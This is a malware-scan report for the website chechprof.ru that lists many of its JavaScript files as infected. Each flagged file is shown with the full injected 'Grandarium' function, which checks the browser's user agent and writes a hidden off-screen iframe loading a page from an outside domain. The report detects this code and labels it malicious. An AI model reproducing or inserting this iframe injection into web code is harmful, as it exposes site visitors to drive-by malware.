Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=chechprof.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.chechprof.ru/ | 200 OK Content-Length: 38205 Content-Type: text/html | clean |
http://www.chechprof.ru/media/system/js/caption.js | 200 OK Content-Length: 2586 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: daboglow.riftenterprises.com function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, ...[1230 bytes skipped]... Decoded script: <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://www.chechprof.ru/plugins/content/avreloaded/silverlight.js | 200 OK Content-Length: 8716 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: daboglow.riftenterprises.com function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); if(!window.Silverlight)window.Silverlight={};Silverlight._silverlightCount=0;Silverlight.ua=null;Silverlight.available=false;Silverlight.fwlinkRoot="http://go.microsoft.com/fwlink/?LinkID=";Silverlight.detectUserAgent ...[3585 bytes skipped]... Decoded script: <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://www.chechprof.ru/plugins/content/avreloaded/wmvplayer.js | 200 OK Content-Length: 17099 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: daboglow.riftenterprises.com function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); if(typeof jeroenwijering=="undefined"){var jeroenwijering=new Object();jeroenwijering.utils=new Object()}jeroenwijering.Player=function(B,C,A){this.configuration={backgroundcolor:"ffffff",file:"video.wmv",height:"260" ...[3356 bytes skipped]... Decoded script: <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://www.chechprof.ru/plugins/content/avreloaded/swfobject.js | 200 OK Content-Length: 12877 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: daboglow.riftenterprises.com function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); var swfobject=function(){var UNDEF="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_INSTALL_ID="S ...[3450 bytes skipped]... Decoded script: <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://www.chechprof.ru/plugins/content/avreloaded/avreloaded.js | 200 OK Content-Length: 2982 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: daboglow.riftenterprises.com function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); if(typeof (allvideos)=="undefined"){var allvideos=new Object();allvideos.APIs=new Array()}function getUpdate(D,C,B,A){if(A=="null"){return }allvideos.APIs.each(function(E){if(E._pid==A){E._plCB(D,C,B)}})}allvideos.API ...[2100 bytes skipped]... Decoded script: <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://www.chechprof.ru/components/com_flippingbook/js/swfobject.js | 200 OK Content-Length: 10843 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: daboglow.riftenterprises.com function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigato ...[3539 bytes skipped]... Decoded script: function f() { if (J) { return; } try { var Z = j.getElementsByTagName("body")[0].appendChild(C("span")); Z.parentNode.removeChild(Z); } catch (aa) { return; } J = true; var X = U.length; for (var Y = 0; Y < X; Y++) { U[Y](); } } <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://www.chechprof.ru/components/com_flippingbook/js/flippingbook.js | 200 OK Content-Length: 5622 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); function FlippingBook() { this.pages = []; this.enlargedImages = []; this.pageLinks = []; this.stageWidth = "100%"; this.stageHeight = "600"; this.settings = { allowPages ...[3722 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://www.chechprof.ru/components/com_flippingbook/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72797 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: daboglow.riftenterprises.com function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.te ...[3458 bytes skipped]... Decoded script: <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://www.chechprof.ru/templates/makazho777/jquery.js | 200 OK Content-Length: 94465 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"| ...[3498 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://www.chechprof.ru/templates/makazho777/script.js | 200 OK Content-Length: 40850 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); (function ($) { 'use strict'; var data = [ { str: navigator.userAgent, sub: 'Chrome', ver: 'Chrome', name: 'chrome' }, { str: navigator.vendor, sub: ...[3811 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://www.chechprof.ru/templates/makazho777/script.responsive.js | 200 OK Content-Length: 14430 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: daboglow.riftenterprises.com function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); var responsiveDesign = { isResponsive: false, isDesktop: false, isTablet: false, isPhone: false, windowWidth: 0, responsive: function () { ...[3767 bytes skipped]... Decoded script: <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://counter.rambler.ru/top100.jcn?2677146 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://www.chechprof.ru/index.php?option=com_content&view=section&id=5&Itemid=61 | 200 OK Content-Length: 24685 Content-Type: text/html | clean |
http://www.chechprof.ru/index.php?option=com_content&view=category&id=35&Itemid=62 | 200 OK Content-Length: 29532 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: chechprof.ru
Result:
GET / HTTP/1.1
Host: chechprof.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: chechprof.ru
Referer: http://www.google.com/search?q=chechprof.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: chechprof.ru
Referer: http://www.google.com/search?q=chechprof.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.